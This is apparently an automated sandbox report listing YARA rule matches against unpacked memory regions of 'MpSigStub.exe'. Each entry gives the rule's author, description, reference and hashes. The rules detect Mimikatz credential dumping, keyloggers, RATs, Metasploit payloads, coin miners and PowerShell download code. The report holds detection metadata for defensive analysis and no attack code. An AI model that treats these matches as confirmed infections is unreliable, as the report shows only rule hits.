Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e1d93b1.181.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fece56a.185.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fece56a.185.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fece56a.185.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5ef9be4d.151.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9be4d.151.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f3c49a2.45.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 11.3.MpSigStub.exe.21b5f3c49a2.45.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 11.3.MpSigStub.exe.21b5f3c49a2.45.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.124.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.124.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 11.3.MpSigStub.exe.21b5e4419f1.88.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 11.3.MpSigStub.exe.21b5fcdc99a.187.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.111.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.111.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5ef9be4d.125.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9be4d.125.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5f9698b9.37.raw.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f9698b9.37.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f62017a.58.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.58.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f94bc01.57.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fed0d72.184.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fed0d72.184.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fed0d72.184.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5ef9a849.126.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9a849.126.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5ea0fb92.56.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.3.MpSigStub.exe.21b5e1c15c6.201.raw.unpack, type: UNPACKEDPE Matched rule: APT_apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 11.3.MpSigStub.exe.21b5e1c15c6.201.raw.unpack, type: UNPACKEDPE Matched rule: apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 11.3.MpSigStub.exe.21b5e21f4fa.19.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e21f4fa.19.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 11.3.MpSigStub.exe.21b5e7211fa.70.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5e2d6a62.67.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
